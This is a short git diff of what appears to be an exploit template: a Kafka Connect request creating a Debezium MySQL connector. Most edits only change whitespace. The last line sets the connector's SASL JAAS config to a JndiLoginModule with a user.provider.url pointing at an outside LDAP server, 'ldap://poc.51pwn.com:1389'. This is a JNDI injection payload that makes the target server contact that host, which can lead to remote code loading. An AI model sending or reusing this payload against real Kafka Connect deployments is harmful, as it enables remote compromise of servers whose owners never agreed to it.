@@ -51,21 +51,21 @@ requests:
51
51
{"name": "test",
52
52
"config":
53
53
{
54
- "connector.class":"io.debezium.connector.mysql.MySqlConnector",
54
+ "connector.class":"io.debezium.connector.mysql.MySqlConnector",
55
55
"database.hostname": "xxxxx",
56
56
"database.port": "3306",
57
57
"database.user": "root",
58
58
"database.password": "xxxxxx",
59
59
"database.dbname": "xxxx",
60
60
"database.sslmode": "SSL_MODE",
61
- "database.server.id": "1234",
61
+ "database.server.id": "1234",
62
62
"database.server.name": "localhost",
63
- "table.include.list": "MYSQL_TABLES",
63
+ "table.include.list": "MYSQL_TABLES",
64
64
"tasks.max":"1",
65
- "topic.prefix": "aaa22",
66
- "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
67
- "schema.history.internal.kafka.topic": "aaa22",
68
- "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
65
+ "topic.prefix": "aaa22",
66
+ "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
67
+ "schema.history.internal.kafka.topic": "aaa22",
68
+ "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
69
69
"database.history.producer.security.protocol": "SASL_SSL",
70
70
"database.history.producer.sasl.mechanism": "PLAIN",
71
71
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://poc.51pwn.com:1389\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxxx\";"
0 commit comments